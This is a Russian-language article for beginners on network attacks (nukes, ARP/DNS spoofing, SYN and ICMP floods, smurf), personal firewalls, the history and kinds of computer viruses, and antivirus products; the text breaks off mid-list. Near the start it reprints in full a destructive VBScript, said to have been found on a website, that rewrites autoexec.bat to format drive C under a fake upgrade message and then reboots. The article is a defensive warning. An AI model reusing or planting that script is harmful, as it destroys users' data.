О "Довнгрейде"…

На войне как на войне…
***
Перед началом просмотра публикации настоятельно рекомендую начинающим пользователям прочесть словарь терминов:
DNS (Domain Name System – система имен доменов) Распределенный механизм имен/адресов, используемых в сети Internet. Используется для
разрешения логических имен в IP-адреса. DNS используется в сети Internet, обеспечивая возможность работы с понятными и легко
запоминающимися именами вместо неудобоваримых чисел IP-адреса.
Domain (домен) В сети Internet часть иерархии имен. Синтаксически доменное имя Internet содержит последовательность имен (меток), разделенных точками (.) например, “fdd5-25.narod.ru” В OSI термин домен используется как административное деление сложных распределенных систем, как в MHS Private Management Domain (PRMD) и
Directory Management Domain (DMD).
ICMP: Internet Control Message Protocol. Протокол, используемый для
контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP.
TCP: Transmission Control Protocol. Основной транспортный протокол в наборе протоколов Internet, обеспечивающий надежные, ориентированные на соединения, полнодуплексные потоки.
TCP/IP (Transmission Control Protocol/Internet Protocol – протокол управления передачей/протокол Internet) Известен также как стек протоколов Internet (Internet Protocol Suite). Данный стек протоколов используется в семействе сетей Internet и для объединения гетерогенных сетей.
Ping: Packet internet groper. Программа, используемая для проверки доступности адресата путем передачи ему специального сигнала (ICMP echo request – запрос отклика ICMP) и ожидания ответа. Термин используется как глагол: “Ping host X to see if it is up!”
Port (порт) Абстракция, используемая транспортными протоколами Internet для обозначения многочисленных одновременных соединений с единственным хостом – адресатом. Физический интерфейс компьютера, мультиплексора и т.п. для подключения терминала или модема.
FTP: File Transfer Protocol. Используемый в Internet протокол (и программа) передачи файлов между хост – компьютерами.
Telnet Протокол виртуального терминала в наборе протоколов Internet. Позволяет пользователям одного хоста подключаться к
другому удаленному хосту и работать с ним как через обычный терминал.
UDP (User Datagram Protocol) Прозрачный протокол в группе протоколов Internet. UDP, подобно TCP, использует IP для доставки; однако, в отличие от TCP, UDP обеспечивает обмен дейтаграммами без
подтверждения гарантий доставки.
***
Каждый пользователь проводящий в интернете много времени может стать потенциальной жертвой сетевой атаки. В чём она может выражаться? Да в чём угодно, от доступа к ресурсам вашего компьютера, до банального отсоединения от провайдера. Причём, в последние время подобные случаи участились на столько, что настал момент когда об этом нужно написать. Я не хочу начинать публикацию с пустого описания программ для защиты в интернет. Ведь программы пишутся под конкретную проблему. И наверное, просто следует написать про то, что и как может вызвать поражение пользователя или сервера в сети. Первое на чём бы я хотел заострить ваше внимание, так это на довольно необычной угрозе для ваших жёстких дисков. Это вредоносные скрипты, которые могут находится на любом сайте.

script language ="VBScript"
sub Reboot
Set
Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe
User.exe,ExitWindows"
RunDll
end sub
sub
destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if
fs.fileexists("c:\autoexec.bat") then
set
ab=fs.getfile("c:\autoexec.bat")
ab.attributes=0
end if
set
autoexec=fs.CreateTextFile("c:\autoexec.bat")
autoexec.WriteLine
"@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close
end sub
destruct
format
reboot

Только видимо неудачный, поскольку мне удалось его выловить с одной занимательной страницы. На которой-то он и лежал, дабы отформатировать мой жёсткий диск. Но к счастью выдал, что у него ошибка в третьей строке. Однажды даже попался немного другой экземпляр, который вписывал себя в автозагрузку WINDOWS и вешал компьютер намертво. Поэтому прошу, не повторяйте моей ошибки посещая сомнительные сайты предложенные вам в чате или в очередном спаме. Развивая тему нельзя не затронуть возможные методы обнаружения злоумышленником вашего компьютера в сети интернет. Пока вы думаете читать ли это дальше, хочу поведать одну жизненную историю. Есть у меня знакомый администратор компьютерного клуба. Где есть выделенный канал. И вот долгими ночами вместо того как играть со всеми в COUNTER STRIKE, он сидит с программой «IP сканер» и ищет пользователей которые на данный момент в сети. Потом уже с помощью другой утилиты сканирует порты. Ports scan. Сканирование компьютерной системы на наличие портов, путем попыток их открытия. Эта атака сильно расходует ресурсы системы. Обычно она используется для поиска слабых мест <дырок> в «ПО», «ОС» компьютера и предшествует более элегантной атаке. К чему я всё это рассказываю? Поймёте прочитав всё ниженаписанное. Любимое оружие всех сетевых сумасбродов это Win Nuke. Hаpяду с обычными данными пересылаемыми по TCP соединению
стандарт предусматривает также передачу срочных (Out Of Band)
данных. У большинства PC с установленным Windows присутствует сетевой протокол Net BIOS, который использует для своих нужд 3 IP порта: 137, 138, 139. Как выяснилось, если соединиться с Windows машиной в 139 порт и послать туда несколько байт Out Of Band данных, то NetBIOS не зная что делать с этими данными попросту подвешивает или перезагружает машину. Для Windows 95 это обычно выглядит как синий текстовый экpан, сообщающий об ошибке в драйвере TCP/IP и невозможность работы с сетью до перезагрузки ОC. NT 4.0 без сервис паков перезагружается, NT 4.0 со вторым сервис паком выпадает в синий экран. Что же касается WINDOWS 98 SE (пропатченная версия). Думаю, стоит быть спокойным. Проведя тест у себя в локальной сети (12 компьютеров), я выяснил, что не один из 18 нюкеров не произвёл никакого воздействия на машины. Хотя не исключено, что старая дыра давно используется в новых, ещё более коварных целях. Чаще всего жертвой NUKE атаки можно стать в обычном web чате. Конечно, нельзя обойти вниманием и другой тип нюков – ICMP: Internet Control Message Protocol. Протокол, используемый для контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP. Суть атаки такая же как и у стандартного NUKE. На компьютер жертвы высылается сообщения об ошибках и компьютер виснет намертво. Что же касается чатов – IRC. Puke. Осуществляется посылка злоумышленником атакуемому хосту пакета ICMP unreachable error (неизвестная ошибка удаленной системы), что в свою очередь вызывает отключение Хоста от сервера (обычно IRC). Сейчас шла речь, на мой взгляд, о более распространённых методах атак на обычного пользователя. Но не стоит упускать из виду и атаки на сервера. Ведь от стабильности оных может зависеть работа сотен людей!
Угроза для серверов это и угроза пользователям.
Есть такая вещь Dummy ARP server. В сети Internet каждый пользователь имеет уникальный IP адрес, на который поступают все сообщения из глобальной сети. Однако протокол IP это не столько сетевой, сколько межсетевой протокол обмена, предназначенный для связи между объектами в глобальной сети. На канальном уровне пакеты адресуются по аппаратным адресам сетевых карт. В сети Internet для взаимно однозначного соответствия IP и Ethernet адресов используется Address Resolution Protocol. Первоначально хост может не иметь информации о Ethernet – адресах других пользователей, находящихся с ним в одном сегменте, в том числе и о Ethernet – адресе маршрутизатора. Соответственно, при первом обращении к сетевым ресурсам хост отправляет широковещательный ARP-запрос, который получат все станции в данном сегменте сети. Получив данный запрос, маршрутизатор отправляет на запросивший хост ARP-ответ, в котором сообщает свой Ethernet-адрес. Данная схема работы позволяет злоумышленнику послать ложный ARP-ответ, в котором объявить себя искомым хостом, (например, маршрутизатором), и, в дальнейшем, активно контролировать весь сетевой трафик “обманутого” хоста. Проще говоря получать все ваши данные. Но это ещё не всё, что может приключиться с нами, пока мы спим.
Dummy DNS. Внедрение в сеть Internet ложного DNS-сервера путем перехвата DNS-запроса. Для реализации атаки злоумышленнику необходимо перехватить DNS-запрос, извлечь из него номер UDP-порта отправителя запроса, двухбайтовое значение ID идентификатора DNS-запроса и искомое имя и, затем, послать ложный DNS-ответ на извлеченный из DNS-запроса UDP-порт, в котором указать в качестве искомого IP-адреса настоящий IP-адрес ложного DNS-сервера. Это позволит в дальнейшем полностью перехватить и активно воздействовать на информацию, циркулирующую между “обманутым” хостом и сервером. Необходимым условием осуществления данного варианта атаки является перехват DNS-запроса. Это возможно только в том случае, если атакующий находится либо на пути основного трафика, либо в сегменте настоящего DNS-сервера. Выполнение одного из этих условий местонахождения хакера в сети делает подобную удаленную атаку трудно осуществимой на практике (попасть в сегмент DNS-сервера и тем более в межсегментный канал связи атакующему скорее всего не удастся). Однако в случае выполнения этих условий возможно осуществить межсегментную удаленную атаку на сеть Internet, что вообще-то нежелательно.
IP Hijacking. Необходимым условием является доступ к машине, находящейся на пути сетевого потока. Напомним, что при передаче данных постоянно используются оба поля находящиеся в IP-заголовке. Исходя из их значения, сервер и клиент проверяют корректность передачи пакетов. Существует возможность ввести соединение в “десинхронизированное состояние”. Это когда присылаемые сервером данные не будут совпадать с ожидаемым значениями клиента, и наоборот. В данном случае злоумышленник, “прослушивая” линию, может взять на себя функции посредника, генерируя корректные пакеты для клиента и сервера и перехватывая их ответы. Метод позволяет полностью обойти такие системы защиты, как, например, одноразовые пароли, поскольку злоумышленник начинает работу уже после того, как произойдет авторизация пользователя. UDP storm. Как правило, по умолчанию системы поддерживают работу таких UDP-портов, как 7 (“эхо”, полученный пакет отсылается назад), 19 (“знакогенератор”, в ответ на полученный пакет отправителю высылается строка знакогенератора) и других. В данном случае хакер может послать единственный UDP-пакет, где в качестве исходного порта будет указан 7, в качестве получателя – 19-й, а в качестве адреса получателя и отправителя будут указаны, к примеру, две машины вашей сети (или даже 127.0.0.1). Получив пакет, 19-й порт отвечает строкой, которая попадает на порт 7. Седьмой порт дублирует ее и вновь отсылает на 19 и так до бесконечности. Бесконечный цикл съедает ресурсы машин и добавляет на канал бессмысленную нагрузку. Конечно, при первом потерянном UDP-пакете буря прекратиться. Traffic analysis (sniffing) Прослушивание канала. Практически все сетевые карты поддерживают возможность перехвата пакетов, передаваемых по общему каналу локальной сети. При этом рабочая станция может принимать пакеты, адресованные другим компьютерам того же сегмента сети. Таким образом, весь информационный обмен в сегменте сети становится доступным хакеру, что поможет в дальнейшем ему подобрать/придумать другие типы атак против Вас. Для успешной реализации этой атаки компьютер злоумышленника должен располагаться в том же сегменте локальной сети, что и атакуемый компьютер. Атака Brute Force “Грубая сила”, используется хакерами в тех случаях, когда доступ к системе либо информации закрыт паролем, а уязвимостей не удалось обнаружить. Осуществляется простым перебором всех возможных либо наиболее часто встречающихся паролей. Во втором случае brute force достаточно часто называют “атакой по словарю”. Fuzzy. Пакет IP содержит поле, определяющее какой протокол следующего уровня(TCP, UDP, ICMP) использует данные из Internet. Хакеры могут использовать нестандартное значение данного поля для передачи данных, которые не будут фиксироваться стандартными средствами контроля информационных потоков.
Denial of service (DOS)
Класс атак, приводящих к отказу в обслуживании. Во время таких атак происходит повышенный расход ресурсов процессора и уменьшение канала пропускной возможности связи, что может привести к сильному замедлению работы всей компьютерной системы, отдельных задач, либо вообще к полной остановке пользователя. К DOS атакам относятся Floods, ICMP flooding, Identification flooding и другие. Изначально оговорюсь, что многое нижеописанное истинно для серверов.
1. Floods. Перевод с английского на русский – “затопление”. Во время floods атак происходит посылка большого количества на атакуемую систему ICMP (чаще всего) либо UDP пакетов, которые не несут полезной информации (мусор). В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших бесполезных пакетов и генерацией на них ответов.
2. SYN flooding. Затопление SYN-пакетами – самый известный способ “забить” информационный канал. Затопление SYN пакетами основано на переполнении очереди сервера, после чего сервер перестает отвечать на запросы пользователей. В различных системах работа с очередью реализована по разному. После истечения некоторого времени (зависит от реализации) система удаляет запросы из очереди. Однако ничего не мешает хакеру послать новую порцию запросов. Таким образом, даже находясь на соединение 2400 bps, злоумышленник может посылать каждые полторы минуты по 20-30 пакетов на сервер, поддерживая его в нерабочем состоянии. Атака обычно направлена на определённую, конкретную службу, например telnet или ftp. Она заключается в передаче пакетов установления соединения на порт, соответствующий атакуемой службе. При получении запроса система выделяет ресурсы для нового соединения, после чего пытается ответить на запрос (послать “SYN-ACK”) по недоступному адресу. По умолчанию NT версий 3.5-4.0 будет пытаться повторить подтверждение 5 раз – через 3, 6, 12, 24 и 48 секунд. После этого еще 96 секунд система может ожидать ответ, и только после этого освободит ресурсы, выделенные для будущего соединения. Общее время занятости ресурсов – 189 секунд.
3. ICMP flooding (flood ping). Перевод с английского на русский – “поток пингов”. Во время этой атаки происходит посылка компьютерной системе жертвы большого количества запросов ICMP. В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших пакетов и генерацией на них ответов. Примечание: В мирных целях пинг используется администраторами и пользователями для проверки работоспособности основных частей транспортной системы вычислительной сети, оценить работу сети при максимальной нагрузке. При стандартном режиме работы пакеты высылаются через некоторые промежутки времени, практически не нагружая сеть.
4. DNS flooding, DNS scan. Эта атака, направленная на сервера имён Internet. Она заключается в передаче большого числа DNS запросов и приводит к тому, что у пользователей нет возможности обращаться к сервису имен и,
следовательно, обеспечивается невозможность работы обычных пользователей. DNS scan. Известно, что прежде чем начинать атаку, хакеры осуществляют выявление целей, т.е. выявление компьютеров, которые будут жертвами атаки, а также компьютеров, которые осуществляют информационный обмен с жертвами. Одним из способов выявления целей заключается в опросе сервера имён и получение от него всей имеющейся информации о домене.
5. Unreachable (dest_unreach, ICMP type 3). Эта атака заключается в том, что компьютерной системе посылается сообщение ICMP type 3, которое сообщает, что порт назначения недоступен тем самым обманывая систему и вынуждая ее разорвать соединение т.к. она будет “думать” что пакеты не доходят. ICMP туре 3 может посылаться клиентской машине, которая затем произведет отключение, либо посылаться серверу и инициатором отключения станет он. Посылку ICMP туре 3 осуществляет хакер.
6. UDP bomb. Передаваемый пакет UDP содержит неправильный формат служебных полей. Некоторые старые версии сетевого ПО приводят при получении подобного пакета к аварийному завершению системы.
7.Smurf. Атака заключается в передаче в сеть широковещательных ICMP запросов от имени компьютера-жертвы. В результате компьютеры, принявшие такие широковещательные пакеты, отвечают компьютеру-жертве, что приводит к существенному снижение пропускной способности канала связи и, в ряде случаев, к полной изоляции атакуемой сети. Атака smurf исключительно эффективна и широко распространена.
8. Pong Floods – атаки, перечисленные выше, но в качестве обратного действительного IP-адреса отправителя используется поддельный. Тем сам затрудняется обнаружение хакера.
Конечно, тяжело решить проблему безопасности в сети. Но можно попробовать. Я хочу рассказать про то, как может себя защитить обычный пользователь. Ведь по статистике именно его компьютер чаще всего становиться жертвой. Для обороны нашего с вами здоровья, давно разработаны средства «индивидуальной защиты». К ним относятся программы FIREWALL (огненная стена). FIREWALL-ы бывают разными, как для домашнего пользования (TINY PERSONAL FIREWALL, BLACK ICE), так и для корпоративного. Предприятия сами разберутся, что им делать. А вот обычный неискушённый пользователь не всегда. Хочу предложить вашему вниманию на мой взгляд самых удачных представителей «огненных стен» . Все они были мною испытаны в разное время, в разных частях интернет. Outpost Firewall (www.agnitum.com) – стал классикой пару лет назад. С тех пор не теряет своих позиций на рынке. Был создан специально для новичков, не требуя много времени на изучение своих настроек и возможностей. В то же время продвинутые пользователи нашли в программе много полезных возможностей, что позволяет создать изощренные настройки для защиты своего компьютера или сети. Уровень Outpost Firewall был высоко оценен крупнейшими отечественными изданиями, такими как «Компьютер-Пресс», «Софтерра», «Хакер», «Компьютерная Газета». Но в бочке мёда нельзя не обойтись ложкой дёгтя. В процессе работы было замечено, что компьютеры на базе процессоров AMD 450, 1600 XP под управлением системы WINDOWS 98 SE частенько после использования этой программы вешались при выключении компьютера. Конечно, я не настаиваю на все 100%, что это вызывает FIREWALL, но такие проблемы случались очень часто. И это наводит на некоторые размышления. Тем не менее это не помешало программе защитить меня пару раз в чате от NUKE атаки. Её пытались провести на компьютер. Кстати, второй эпизод знакомства с Outpost случился намного позже ещё в одном чате. На сей раз FIREWALL выдал, что был запущен ICMP фраг. В обеих случаях мой компьютер не пострадал. Это и является самой лучшей характеристикой программы. Второй продукт, который считается одним из лидеров в своей области называется Norton Personal Firewall или ещё одна его разновидность Norton Internet Security (www.symantec.com).
Norton Internet Security специально предназначена для защиты вас и вашей семьи от опасностей которые подстерегают в Internet. Основные его возможности : Закрывает доступ в Internet детям, автоматически преграждает путь вирусам и другому вредному коду. Что очень удачно подходит для борьбы со скриптовыми вирусами, описанными чуть выше. Защищает ваш компьютер как от атак из вне, так и от программ троянов, которые могут попытаться вырваться в сеть с украденной информацией.
Вообще-то программ подобного рода очень и очень много. И для описания хотя бы десятка их потребовалась не одна журнальная страница. Именно по этому в окончании публикации я хочу привести отрывок одного текста (переведённого с английского), который был написан для программы Black Ice (FIREWALL) ещё в 1999 году.
«Большинство хакеров являются неопытными детьми желающими пошутить. Они просто хотят порисоваться перед своими друзьями, что они могут взломать систему. К несчастью, даже неопытный взломщик может вызвать серьезный ущерб войдя в вашу сеть. Корпорации давно узнали о рисках для их бизнеса вызванного хакерами. Тем не менее, большинство министерств внутренних дел и пользователей – не подозревают, что хакеры могут сделать. Они могут сделать ваш компьютерный полностью непригодным к работе. Хакеры могут украсть или удалить важные данные. Находчивый взломщик может вызвать огромный финансовый ущерб, компаниям которые каждый, используют Internet. В 1997 комиссия Сената США, Роберта S. Litt, Deputy (ассистента Министра Юстиции) установила. Компьютерные преступление обходятся от $500 миллионов до $10 миллиардов долларов за год. Институт компьютерной безопасности опросил 428 специалистов информационной безопасности в компаниях. 42% респондентов указало, что происходило несанкционированное использование их компьютерных систем в течение прошлого года. И всё из-за отсутствия централизованного управления или недостаточного финансирования.» Напомню ещё раз, что такая ситуация была в 1997 году. С тех пор многое изменилось. Но одна вещь осталось незыблемой. На безопасности экономить нельзя!

При создании публикации были использованы материалы с сайта

http://kiev-security.org.ua

Роман Карпач

(начинающему пользователю посвящается)
Уж сколько раз твердили пользователям во всём мире, что следует пользоваться антивирусными программами. Но многие так никогда и не делают этого. А зря. Ведь никто не застрахован от попадания в компьютер разнообразных вредоносных программ. Из своего опыта добавлю, что самая уязвимая прослойка пользователей это секретари и бухгалтеры, которые по простоте душевной или по незнанию не обновляют свои антивирусы. А бывает, так что даже и не пользуются ими. На написание этой статьи меня подбил целый ряд жизненных ситуаций. Когда у многих пропадала важная информация с компьютеров и огромные базы данных. И всего лишь потому, что захотелось не весть откуда принести дискету с заражённой WINCIH Масяней. А ведь подобные случаи не единичны! И поэтому заражение древним вирусом “Чернобыль” продолжается повсеместно, хотя его обнаружит любой современный антивирусный пакет.
Вирусы как вид программ.
У каждого человека, который пользуется компьютером, наверняка, есть свой первый вирус. Для меня это была незабвенная вещица под названием ”Миссис Пакман”. А для вас? Напрягите память! Проблем, к слову сказать, она принесла много. Но за то в те далёкие 90-е многие поняли, что с вирусами шутки плохи. Само же понятие “компьютерный вирус” впервые употребил сотрудник Лехайского университета (США)
Ф. Коэн на конференции по безопасности информации в 1984 году. Однако, еще в работах Винера и фон Неймана исследовались различные виды конечных автоматов, в том числе и самовоспроизводящихся. Что же такое в научном ведении компьютерный вирус?
Вирус – это фрагмент программы, разработанный и написанный с целью неблагоприятного воздействия на Ваш компьютер посредством изменения способа его работы без Вашего ведома или разрешения. Выражаясь техническим языком, вирус – это сегмент программного кода, имплантирующий себя в один из Ваших исполняемых файлов и систематически распространяемый из одного файла в другой. Компьютерные вирусы не образуются сами. Они должны быть написаны и имеют определенную цель. Обычно вирус выполняет две разные функции:
- Распространяет себя из одного файла в другой без Вашего подтверждения или ведома. На техническом языке это называется саморепликацией или размножением.
- Внедряет симптом или нарушение, запланированное злоумышленником. Он может портить диск, искажать программы или просто навести беспорядок в компьютере. На техническом языке это называется полезной нагрузкой вируса, которая может быть доброкачественной или злокачественной по прихоти создателя вируса. Доброкачественный вирус – тот, который не нацелен на причинение компьютеру реального ущерба. Например, вирус, скрывающийся до определенной даты или времени, а затем только выводит некоторое сообщение, считается доброкачественным.
Злокачественный вирус пытается причинить вред компьютеру, в том числе и непреднамеренный. Существует большое число вирусов, причиняющих
ущерб из-за некачественного программирования и явных ошибок в коде самого вируса. Злокачественный вирус – способен изменить одну или более программ, так что они перестают работать надлежащим образом. Зараженная программа может внезапно прекращать работу, записывать неверную информацию в документы. Или вирус может менять информацию о каталогах в системной области диска. Это мешает монтированию
разделов или запуску одной или более программ; а бывает, что программы не могут найти нужные документы. Хотя некоторые вирусы считаются доброкачественными; большая их
часть – это злокачественные вирусы. Некоторые самые опасные из них портят весь жесткий диск или удаляют файлы.
Немного истории.
Мнений по поводу даты рождения первого компьютерного вируса очень много. Мне доподлинно известно только одно: на машине Чарльза Бэббиджа его не было, а на Univac 1108 и IBM-360/370 они уже были (Pervading Animal и Christmas Tree). Таким образом, первый вирус появился где-то в самом начале 70-х или даже в конце 60-х годов, хотя так его никто еще не называл. На этом разговор о вымерших ископаемых предлагаю
считать завершенным. Поговорим о новейшей истории: Brain, Vienna, Cascade и далее. Те, кто начал работать на IBM PC в середине 80-х, еще не забыли повальную эпидемию
этих вирусных заболеваний в 1987—1989 гг. Буквы сыпались на экранах, а толпы пользователей неслись к специалистам по ремонту дисплеев (сейчас все наоборот: винчестер скончался от старости, а валят на неизвестный передовой науке вирус). Затем компьютер заиграл чужеземный гимн “Yankee Doodle”, но чинить динамики уже никто не бросился, очень быстро разобрались, что это — вирус, да не один, а целый десяток.
Так вирусы начали заражать файлы. Вирус Brain и скачущий по экрану шарик вируса Ping-pong ознаменовали победу вируса и над Boot-сектором. Все это очень не нравилось пользователям IBM PC, и появились противоядия. Следует обратить внимание на то, что истории завоевания вирусами СНГ и Запада различаются между собой. Первым вирусом, стремительно распространившимся на Западе, был загрузочный вирус Brain, и только потом появились файловые вирусы Vienna и Cascade. В СНГ же, наоборот, сначала появились файловые вирусы, а годом позже — загрузочные. Время шло, вирусы плодились. Все они были чем-то похожи друг на друга, лезли в память, цеплялись к файлам и секторам, периодически убивали файлы, дискеты и винчестеры. Одним из “откровений” стал вирус Frodo.4096 — первый из известных файловых вирусов-невидимок. Этот вирус перехватывал INT 21h и при обращении через DOS к зараженным файлам изменял информацию таким образом, что файл появлялся перед пользователем в незараженном виде. Но это была только надстройка вируса над MS-DOS. Прошло некоторое время, вирусы как электронные тараканы полезли внутрь ядра ДОС (Beast.512). Идея невидимости продолжала приносить свои плоды. Летом 1991 года кося компьютеры, как бубонная чума, вирус Dir_II завоевал мир. Но бороться с невидимками довольно просто. Следует лишь очистить RAM и будь спокоен. Больше хлопот доставляли само шифрующиеся вирусы, которые иногда встречались в очередных поступлениях в коллекции. Ведь для их идентификации и удаления приходилось писать специальные подпрограммы, отлаживать их. Но на это никто не обращал внимания. Пока не появились вирусы нового поколения, которые носят название полиморфик вирусов. Эти вирусы используют другой подход к невидимости: они шифруются (в большинстве случаев), а в расшифровщике используют команды, которые могут не повторяться при заражении различных файлов. Первый полиморфик вирус появился в начале 90-х годов. Это был Chameleon. Но по-настоящему серьезной проблема стала лишь год спустя — в апреле 1991 года, когда практически весь мир был охвачен эпидемией компьютерного вируса Tequila. Эта эпидемия практически не затронула Россию, а первая российская эпидемия, вызванная полиморфик вирусом, нагрянула три года спустя – 1994 год (Phantom 1). Популярность идеи самошифрующихся вирусов вылилась в появление генераторов полиморфик кода. В начале 1992 года появляется знаменитый вирус Dedicated, базирующийся на первом известном генераторе MtE и открывший серию MtE-вирусов. Представляет он из себя объектный модуль (OBJ-файл), и теперь для того,
чтобы из самого обычного нешифрованного вируса получить полиморфик мутанта, достаточно лишь скомпоновать их объектные модули в OBJ-файл. Автору вируса, если он пожелает создать настоящий вирус, уже не надо корпеть над кодами собственного шифровщика – расшифровщика. При желании он может подключить к своему вирусу
генератор и вызывать его из кодов вируса. К счастью, первый MtE-вирус не попал в
“живую природу” и не вызвал эпидемии, а разработчики антивирусных программ соответственно имели некоторый запас времени для подготовки к отражению новой напасти. Всего год спустя изготовление таких вирусов становится уже ремеслом. В
1993 году произошел их “обвал”. Создается впечатление, что одним из основных направлений в трудном деле создания вирусов становится разработка и отладка полиморфик механизма. Конкуренция среди авторов вирусов сводится не к тому, кто из них напишет самый крутой вирус, а чей механизм окажется круче всех. Вот далеко не полный список тех из них, которые можно назвать стопроцентно полиморфными:
(на конец 1993 г.): Bootache, CivilWar (четыре версии), Crusher, Dudley, Fly, Freddy, Ginger, Grog, Haifa, Moctezuma (две версии), MVF, Necros, Nukehard, PcFly (три версии), Predator, Satanbug, Sandra, Shoker, Todor, Tremor, Trigger, Uruguay (восемь версий).
Для обнаружения этих вирусов приходится использовать специальные методы, к
которым можно отнести эмуляцию выполнения кода вируса, математические алгоритмы восстановления участков кода и данных в вирусе. К нестопроцентным полиморфикам (т. е. вирусам, которые шифруют себя, но в дешифраторе вируса всегда существуют постоянные байты) можно отнести еще десяток вирусов: Basilisk, Daemaen,
Invisible (две версии), Mirea (несколько версий), Rasek (три версии), Sarov, Scoundrel, Seat, Silly, Simulation. Однако и они требуют расшифровки кода для их обнаружения и восстановления пораженных объектов, поскольку длина постоянного кода в дешифраторе этих вирусов слишком мала. Распространялись генераторы вирусов по станциям BBS в виде архивов, содержащих объектные модули, документацию и примеры использования. В конце 1993 г. было известно уже семь генераторов полиморфик кода.
Это были: МТЕ 0.90 (Mutation Engine), четыре различные версии ТРЕ (Trident Polymorphic Engine), NED (Nuke Encryption Device), DAME (Dark Angel’s Multiple Encryptor).
С тех пор новые полиморфные генераторы появлялись по нескольку штук в год, и приводить их полный список вряд ли имеет смысл.
Что же сейчас могут вирусы?
Как вы ещё не перепугались? И не побежали галопом проверять свой компьютер на наличие вирусов? Похвально! У Вас железные нервы. Ну, коли так, перейдём к самой напряжённой части этой публикации. А именно описанию возможностей современных вирусов.
Вирусы, заражающие файлы:
Это вирусы, присоединяющиеся к файлам .COM и .EXE (или подменяющие их), хотя в отдельных случаях они могут заражать и файлы с расширениями .SYS, .DRV, .BIN, .OVL и .OVY. Вирусы этого типа обычно делают неинфицированные программы инфицированными, когда они исполняются в памяти. В других случаях программы заражаются, когда они открыты (например, с применением команды DOS DIR), или вирус просто заражает все файлы в каталоге, из которого он запущен (прямая инфекция).
Вирусы загрузочного сектора:
Каждый логический диск, жесткий или гибкий, содержит загрузочный сектор. Это относится даже к несистемным дискам. В загрузочном секторе находится специфическая информация о формате диска, хранящихся на нем данных, а также небольшая программа,
называемая программой загрузки (она загружает системные файлы DOS). Программа загрузки отображает знакомое сообщение “Non-system Disk or Disk Error”, если системные файлы DOS отсутствуют. Эту программу и заражают вирусы. Вирус загрузочного сектора можно получить, оставив в дисководе зараженную дискету и загрузив машину. При считывании и выполнении программы загрузочного сектора вирус попадает в память и заражает жесткий диск. Помните, что так как загрузочный сектор есть у каждого диска, машину можно заразить и от диска данных (обычно так и происходит).
ПРИМЕЧАНИЕ: Загрузочный сектор есть как на дискетах, так и на жестком диске.
Вирусы главной загрузочной записи:
Первый физический сектор каждого жесткого диска (сторона Ш, дорожка Ш, сектор 1) содержит главную загрузочную запись (Master Boot Record, MBR) и таблицу разделов. В главной загрузочной записи находится маленькая программа, называемая главной загрузочной программой, которая определяет положение загрузочного раздела по таблице разделов и командует системе идти туда и выполнять любой содержащийся там код. Предположим, что диск отформатирован правильно, и загрузочный сектор находится в позиции (сторона Ш, дорожка Ш, сектор 1). На флоппи-дисках те же самые вирусы заражают загрузочный сектор. Вирус главной загрузочной записи распространяется точно так же, как и вирус загрузочного сектора – когда зараженная дискета оставлена в дисководе во время перезагрузки машины. При считывании и исполнении программы
загрузочного сектора вирус попадает в память и заражает MBR жесткого диска. Опять же, так как загрузочный сектор имеется на каждом диске, машину можно заразить и от диска данных.
Многораздельные вирусы:
Многораздельные вирусы представляют собой сочетание перечисленных выше вирусов. Они заражают как файлы, так и записи MBR или загрузочные секторы. Вирусы этого типа встречаются редко, но их число постоянно растет.
Чего вирусы не делают:
Компьютерные вирусы не заражают файлы на защищенных от записи дисках и не заражают документов, за исключением случая макровирусов Word, которые заражают только документы и шаблоны Word 6.0 или выше. Не заражаются и копрессированные файлы. Вирусы не действуют на аппаратуру компьютера – мониторы, микросхемы и
т.п.; они заражают только программы. Кроме того, вирусы Macintosh не заражают компьютерные программы для DOS и наоборот. Например, знаменитый вирус Michelangelo не заражает приложения для Macintosh. Опять же, исключение из этого
правила составляют макровирусы Word и Excel, которые поражают электронные таблицы, документы и шаблоны, которые могут открывать компьютеры Windows или Macintosh. Наконец, вирусы не обязательно как-то проявляют себя – даже после того как что-то испортилось.
Как распространяются вирусы:
Вирусы распространяются при запуске зараженного приложения или загрузке компьютера с диска, системные файлы которого заражены. Например, если программа текстового процессора заражена вирусом, он активизируется при работе этой программы.
Когда вирус находится в памяти, он обычно заражает любую программу, с которой Вы работаете, включая сетевые приложения (если у Вас есть право записи на сетевые диски или в папки). Вирусы ведут себя по-разному. Некоторые остаются активными в памяти до выключения компьютера. Другие – только до тех пор, пока работает зараженная программа. Выключение компьютера или выход из приложения удаляет вирус из памяти, но не из зараженного файла или с диска. Если вирус находится в системном файле, он активизируется при следующей загрузке системы с зараженного диска. Если вирус
находится в приложении, он снова активизируется при следующем запуске этого приложения.
Доктора вызывали?
Заканчивая тему нельзя не коснуться самого главного, а именно защиты от напасти под названием компьютерный вирус. Для этого существуют антивирусные пакеты. К сожалению, многие из них платные, а другие нет. В любом случае я приведу обзор этих программ, а Вам уже решать, что использовать у себя дома, а что в офисе с разветвлённой локальной сетью.
Платные антивирусы:
AVP www.avp.ru

“Лаборатория Касперского” предлагает широкий спектр антивирусного программного обеспечения, как для индивидуальных пользователей, так и для корпоративных сетей под
названием AntiViral Toolkit Pro.
“…Мы предлагаем все типы антивирусной защиты: антивирусные сканеры, мониторы и ревизоры контроля несанкционированного изменения на диске…”. АВП поддерживает все наиболее популярные операционные системы, почтовые системы, межсетевые экраны (firewall). А так же обеспечивает полный контроль, за всеми возможными каналами проникновения компьютерных вирусов. Мощные локальные и сетевые средства автоматизации и централизованного контроля над антивирусной защитой “Лаборатории Касперского” обеспечивают пользователям максимальное удобство и скорость при построении собственной системы защиты против компьютерных вирусов.
Антивирусные продукты “Лаборатории Касперского” имеют сертификаты российских и международных государственных организаций и независимых тестовых лабораторий.
Продукты Symantec Corpotation:

